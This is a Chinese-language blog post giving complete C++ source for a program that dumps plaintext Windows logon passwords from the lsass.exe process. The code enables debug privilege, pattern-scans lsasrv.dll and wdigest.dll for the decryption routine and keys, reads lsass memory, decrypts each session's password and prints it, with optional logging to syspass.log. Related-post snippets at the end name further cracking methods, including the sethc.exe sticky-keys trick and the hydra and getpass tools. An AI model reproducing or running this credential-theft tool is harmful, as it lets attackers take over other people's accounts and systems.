用c++编写破解Windows密码程序

用c++编写破解Windows密码程序(缺点只能破解当前电脑的密码）

.cpp文件

#include "CrackWinPassword.h"
#pragma warning(disable:4996)
#pragma warning(disable:4703)
HANDLE GetProcessHandleByName(const CHAR* szName)
{//// GetProcessHandle获得lsass.exe进程句柄//DWORD   ReturnLength, nBytes;WCHAR  Buffer[MAX_PATH + 0x20];//PWCHAR pRetStr;pNTQUERYPROCESSINFORMATION NtQueryInformationProcess;CHAR   szCurrentPath[MAX_PATH];//获取函数地址NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");// Process ID 一定是 4 的倍数DWORD dwProcessId;//进程IDHANDLE hProcess;//进程句柄for (dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4){//打开一个进程hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);if (hProcess != NULL){//将指定类型的进程信息拷贝到某个缓冲if (!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength)){//pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4));/*"bd6\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe""\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe"*///去除前面4个字符PWCHAR pszPath = (PWCHAR)((char*)Buffer + 8);//将宽字符转换为多字节nBytes = WideCharToMultiByte(CP_ACP, 0, pszPath, -1, szCurrentPath, MAX_PATH, NULL, NULL);if (nBytes){PCHAR pCurName = &szCurrentPath[nBytes - 1];while (pCurName >= szCurrentPath){if (*pCurName == '\\')break;pCurName--;}pCurName++;if (lstrcmpi(szName, pCurName) == 0){return hProcess;}}}// 关闭打开的句柄CloseHandle(hProcess);}}return NULL;
}//
//根据密文关键指针特征码 KeyPointerSign[]获得密文存储的关键相关地址
//
LPVOID GetEncryptListHead()
{//LPVOID pEndAddr, KeyPointer, pTemp;//加载wdigest.dll模块，获取模块地址也就是模块基地址HINSTANCE hModWdigest = LoadLibrary("wdigest.dll");//获取函数SpInstanceInit地址  也就是结束地址LPVOID pEndAddr = GetProcAddress(hModWdigest, "SpInstanceInit");//当前指针 将模块基地址赋值给他LPVOID pTemp = hModWdigest;LPVOID KeyPointer = NULL;while (pTemp < pEndAddr && pTemp != NULL){KeyPointer = pTemp;pTemp = (LPVOID)SearchBytes((PBYTE)pTemp + sizeof(KeyPointerSign),  //起始地址(PBYTE)pEndAddr,                      //结束地址KeyPointerSign,                           //查找数据sizeof(KeyPointerSign));              //查找大小}KeyPointer = (LPVOID)(*(DWORD*)((DWORD)KeyPointer - 4));//释放模块FreeLibrary(hModWdigest);return KeyPointer;
}void k8writeTxt(char* logtext)
{//写入txtFILE* pFile = NULL;pFile = fopen("syspass.log", "a+");// 12345/n5678/n 用sizeof 结果竟然只得到 1234//fwrite( ptext2,  sizeof(ptext2), 1, pFile );fwrite(logtext, strlen(logtext), 1, pFile);fclose(pFile); //关闭时会写入结束符
}int main()
{//DWORD     LogonSessionCount, i, dwBytesRead;//PLUID     LogonSessionList, pCurLUID, pListLUID;BYTE      EncryptBuf[0x200];//调节进程权限if (FALSE == EnableDebugPrivilege()){printf("调整进程权限失败.错误代码:%d\n", GetLastError());return 0;}//根据进程名字，获取进程句柄HANDLE  hLsassProcess = GetProcessHandleByName("lsass.exe");if (hLsassProcess == NULL){printf("通过进程名获取进程句柄失败.错误代码:%d\n", GetLastError());printf("尝试以管理员身份运行.\n");return 0;}OSVERSIONINFO VersionInformation;DWORD dwVerOff = 0, osKind = -1;//操作系统版本判断memset(&VersionInformation, 0, sizeof(VersionInformation));VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);if (FALSE == GetVersionEx(&VersionInformation)){printf("获取操作系统版本失败.错误代码:%d\n", GetLastError());return 0;}if (VersionInformation.dwMajorVersion == 5){if (VersionInformation.dwMinorVersion == 1){dwVerOff = 36;osKind = WINXP;}else if (VersionInformation.dwMinorVersion == 2){dwVerOff = 28;osKind = WIN03;}}else if (VersionInformation.dwMajorVersion == 6){dwVerOff = 32;osKind = WIN7;}if (osKind == -1){printf("[未知操作系统版本] 主版本号: %d 次版本号: %d\n", VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion);CloseHandle(hLsassProcess);return 0;}//获得解密函数地址HINSTANCE hModLsasrv = LoadLibrary("lsasrv.dll");if (hModLsasrv == NULL){printf("加载lsasrv.dll模块失败.错误代码:%d", GetLastError());return 0;}pDECRIPTFUNC  DecryptFunc;//搜索指定地址处的解密函数特征值字节序列DecryptFunc = (pDECRIPTFUNC)SearchBytes((PBYTE)hModLsasrv,      //lsasrv模块句柄,模块基地址(PBYTE)0x7fffdddd,        //结束地址DecryptfuncSign,      //解密函数特征码sizeof(DecryptfuncSign));//字节个数// 获得密文链表头地址LPVOID  ListHead;ListHead = GetEncryptListHead();// 获得全局数据(lsasrv.data及解密KEY相关的数据)CopyKeyGlobalData(hLsassProcess, hModLsasrv, osKind);//加载这个模块Secur32.dllHINSTANCE hModSecur32 = LoadLibrary("Secur32.dll");//加载LsaEnumerateLogonSessions函数地址 ：检索现有的登录会话标识符集合（LUIDs）和会话数量。pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions");//加载LsaGetLogonSessionData函数 检索指定的登录会话信息。若要检索关于登录会话的信息，调用方必须是会话的所有者或本地系统管理员。pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData");//加载LsaFreeReturnBuffer函数 释放缓冲的LSA先前分配的内存使用。pLSAFREERETURNBUFFER LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer");//检索现有的登录会话标识符集合（LUIDs）和会话数量DWORD     LogonSessionCount;//会话数量PLUID     LogonSessionList;//登录会话标识符集合LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList);for (DWORD i = 0; i < LogonSessionCount; i++){DWORD      dwBytesRead;      //读取字节总数//当前特权值PLUID     pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i);PLUID pListLUID;// 打印相关信息printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID);// 遍历链式结构查找当前的LUIDReadProcessMemory(hLsassProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead);while (*(DWORD*)EncryptBuf != (DWORD)ListHead){ReadProcessMemory(hLsassProcess, (LPVOID)(*(DWORD*)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead);pListLUID = (LUID*)((DWORD)EncryptBuf + 0x10);if ((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart)){break;}}if (*(DWORD*)EncryptBuf == (DWORD)ListHead){puts("Specific LUID NOT found\n");continue;}DWORD   pFinal = 0;DWORD   nBytes = 0;LPVOID  pEncrypt;pFinal = (DWORD)(pListLUID)+dwVerOff;nBytes = *(WORD*)((DWORD)pFinal + 2);            // 密文大小pEncrypt = (LPVOID)(*(DWORD*)((DWORD)pFinal + 4)); // 密文地址(Remote)memset(Encryptdata, 0, sizeof(Encryptdata));ReadProcessMemory(hLsassProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead);// 调用解密函数解密DecryptFunc(Encryptdata, nBytes);// 打印密码明文printf("密码: %S\n\n", Encryptdata);//k8writeTxt((char*)Encryptdata);//保存日志}CloseHandle(hLsassProcess);LsaFreeReturnBuffer(LogonSessionList);FreeLibrary(hModLsasrv);FreeLibrary(hModSecur32);if (osKind == WIN7){FreeLibrary(GetModuleHandle("bcrypt.dll"));FreeLibrary(GetModuleHandle("bcryptprimitives.dll"));}system("echo 请按任意键退出... & pause > nul");return 0;
}void printSessionInfo(pLSAGETLOGONSESSIONDATA  LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{PSECURITY_LOGON_SESSION_DATA pLogonSessionData;LsaGetLogonSessionData(pCurLUID, &pLogonSessionData);printf("UserName: %S\n", pLogonSessionData->UserName.Buffer);printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer);LsaFreeReturnBuffer(pLogonSessionData);
}//提升进程权限
BOOL EnableDebugPrivilege()
{//打开与进程相关联的访问令牌HANDLE hToken;if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)){return FALSE;}//查看系统权限的特权值，返回信息到一个LUID结构体里LUID   sedebugnameValue;if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)){return 0;}//调整访问令牌的特权TOKEN_PRIVILEGES tkp;tkp.PrivilegeCount = 1;tkp.Privileges[0].Luid = sedebugnameValue;tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)){return FALSE;}return TRUE;
}//
// 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列，字节个数为nsize
//
PBYTE SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{DWORD count;PBYTE pDst;while ((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd){pDst = pBytes;count = 0;while (count < nsize && *pBegin == *pDst){pBegin++;pDst++;count++;}if (count == nsize)  break;pBegin = pBegin - count + 1;}if (count == nsize){return (PBYTE)((DWORD)pBegin - (DWORD)count);}else{return NULL;}
}//获得全局数据(lsasrv.data及解密KEY相关的数据)
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{//节表（区块表） PE文件中所有节的属性都被定义在节表中，节表由一系列的IMAGE_SECTION_HEADER结构排列而成，每个结构用来描述一个节PIMAGE_SECTION_HEADER pSectionHead;//DOS头部是由IMAGE_DOS_HEADER结构体来定义的PIMAGE_DOS_HEADER     pDosHead;//PE头部是真正用来装载Win32程序的头部,该结构体包含PE标识符、文件头与可选头这三部分。该头部具有32位和64位之分PIMAGE_NT_HEADERS     pPEHead;DWORD                 dwBytes, dwBytesRead;LPVOID                pdataAddr, pDecryptKey, DecryptKey, pEndAddr;pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv;//获取节表地址pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv+ sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER));//节表数据地址 模块基地址+相对虚拟地址pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv);//数据大小dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000;//根据进程句柄读入该进程的某个内存空间ReadProcessMemory(hProcess,      //正在读取的内存的进程的句柄pdataAddr,       //指向指定进程中要读取的基址的指针pdataAddr,        //指向缓冲区的指针，该缓冲区从指定进程的地址空间接收内容dwBytes,        //要从指定进程读取的字节数。&dwBytesRead);   //实际读取的字节数大小。指向一个变量的指针，该变量接收传输到指定缓冲区中的字节数。//PE头指针pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv);//pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv);switch (osKind){case WINXP:case WIN03:{pDecryptKey = (LPVOID)SearchBytes((PBYTE)(hModlsasrv),(PBYTE)pEndAddr,DecryptKeySign_XP,sizeof(DecryptKeySign_XP));pDecryptKey = (LPVOID) * (DWORD*)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP));ReadProcessMemory(hProcess,(LPVOID)pDecryptKey,&DecryptKey,4,&dwBytesRead);// DecryptKey 是与解密相关的关键地址ReadProcessMemory(hProcess,(LPVOID)DecryptKey,MemBuf,0x200,&dwBytesRead);pdataAddr = (LPVOID)pDecryptKey;*(DWORD*)pdataAddr = (DWORD)MemBuf;break;}case WIN7:{// WIN7 需调用这两个DLL中的函数进行解密LoadLibrary("bcrypt.dll");//加密解密库LoadLibrary("bcryptprimitives.dll");pDecryptKey = (LPVOID)SearchBytes((PBYTE)(hModlsasrv),(PBYTE)pEndAddr,DecryptKeySign_WIN7,sizeof(DecryptKeySign_WIN7));pDecryptKey = (LPVOID)(*(DWORD*)((DWORD)pDecryptKey - 4));// DecryptKey 是与解密相关的关键地址ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead);ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead);pdataAddr = (LPVOID)pDecryptKey;*(DWORD*)pdataAddr = (DWORD)MemBuf;ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead);pdataAddr = (LPVOID)((DWORD)MemBuf + 8);*(DWORD*)pdataAddr = (DWORD)SecBuf;ReadProcessMemory(hProcess, (LPVOID)(*(DWORD*)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead);pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC);*(DWORD*)pdataAddr = (DWORD)ThirdBuf;break;}}return;
}

.h头文件

#include <windows.h>
#include <stdio.h>#define MEM_SIZE 0x1000
#define WIN7     0x1
#define WINXP    0x2
#define WIN03    0x4typedef struct _LSA_UNICODE_STRING
{USHORT Length;USHORT MaximumLength;PWSTR  Buffer;
}LSA_UNICODE_STRING, * PLSA_UNICODE_STRING;typedef struct _SECURITY_LOGON_SESSION_DATA
{ULONG Size;LUID LogonId;LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING LogonDomain;LSA_UNICODE_STRING AuthenticationPackage;ULONG LogonType;  ULONG Session;PSID Sid;LARGE_INTEGER LogonTime;LSA_UNICODE_STRING LogonServer;LSA_UNICODE_STRING DnsDomainName;LSA_UNICODE_STRING Upn;
}SECURITY_LOGON_SESSION_DATA, * PSECURITY_LOGON_SESSION_DATA;typedef int(__stdcall* pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG);
typedef int(__stdcall* pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID*);
typedef int(__stdcall* pDECRIPTFUNC)(PBYTE, DWORD);
typedef int(__stdcall* pLSAFREERETURNBUFFER)(PVOID);
typedef int(__stdcall* pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA*);BOOL   EnableDebugPrivilege();
void   printHexBytes(PBYTE data, int nBytes);
PBYTE  SearchBytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize);
void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind);
HANDLE GetProcessHandleByName(const CHAR* szName);
LPVOID GetEncryptListHead();
void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID);// 解密函数特征码(lsasrv.text)
BYTE DecryptfuncSign[] =
{0x8B, 0xFF, 0x55, 0x8B,0xEC, 0x6A, 0x00, 0xFF,0x75, 0x0C, 0xFF, 0x75,0x08, 0xE8
};// 密钥KEY相关的关键地址特征码(lsasrv.text)
BYTE DecryptKeySign_WIN7[] =
{0x33, 0xD2, 0xC7, 0x45,0xE8, 0x08, 0x00, 0x00,0x00, 0x89, 0x55, 0xE4
};BYTE DecryptKeySign_XP[] =
{0x8D, 0x85, 0xF0, 0xFE,0xFF, 0xFF, 0x50, 0xFF,0x75, 0x10, 0xFF, 0x35
};// 密文关键指针特征码(wdigest.text)
BYTE KeyPointerSign[] =
{0x8B, 0x45, 0x08, 0x89,0x08, 0xC7, 0x40, 0x04
};// 全局变量
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200];
BYTE Encryptdata[0x100];

用c++编写破解Windows密码程序相关推荐

free rainbow 分布式破解 WINDOWS 密码的最好选择！
我们虽然可以通过Rainbow Table与Ophcrack的组合以更加快速的方式暴力破解Windows密码.但是对于个人,下载或者自己制作几G,甚至几十G的Rainbow Table,结果只破解一. ...
手工破解windows密码
[CMD之魅力:常用命令] net user:查看所有用户. net user 用户名:查看指定用户的信息. net localgroup administrators:查看管理员组的用户信息. ...
破解windows密码
破解Windows系统密码利用5次shift漏洞破解win7密码漏洞在未登录系统是.连续按5次shift建,弹出程序c:\windows\system32\sethc.exe 部分win7 及w ...
使用Rainbow tables和Ophcrack的组合工具破解Windows密码
本文为寻找人生的起点 (http://blog.cn-ic.org)原创,如需转载,请注明出处,并保留原文链接 . 从前面的两篇文章(得到WindowsXP管理员权限的有效方法 ,John/bkhiv ...
使用get password破解windows密码
工具网盘下载地址: 链接:https://pan.baidu.com/s/1UZoPE3cJl1lJ4wEcy1nYiA 提取码:kjjy 下载压缩包后解压,根据自己的系统位数选择合适的.exe文件. ...
（02）C++ builder之WINDOWS系统服务编写与WINDOWS桌面程序调用
(中行雷威2018.3.12) (同一个世界,同一个梦想,交流学习C++Builder XE10,传承c++builder的魅力!欢迎各地朋友加入我的QQ群484979943,进群密码"BC ...
为自己编写的windows应用程序制作安装包
1 写好了一个windows程序之后如何制作安装包这个在vs中就可以直接发布了,可以制作msi的安装包和exe的安装包. 2 window应用程序安装包做了哪些事情 rpm安装包的话,只是把相应的文 ...
简简单单实践ERD Commander2005破解Windows密码
软件名称:ERD Commander 2005 Boot CD 汉化加强版软件版本:0.9 Pro β 软件类型:免费使用平台:Windows 2000/XP/2003 汉化:易通注:版权归原作 ...
暴力破解Windows、Linux登录密码
Windows密码破解使用hydra离线破解windows密码. 使用getpass内存提取windows用户密码. 使用quarkpwdump导出windows用户密码hash值. Linux密码 ...

用c++编写破解Windows密码程序

用c++编写破解Windows密码程序相关推荐

最新文章

热门文章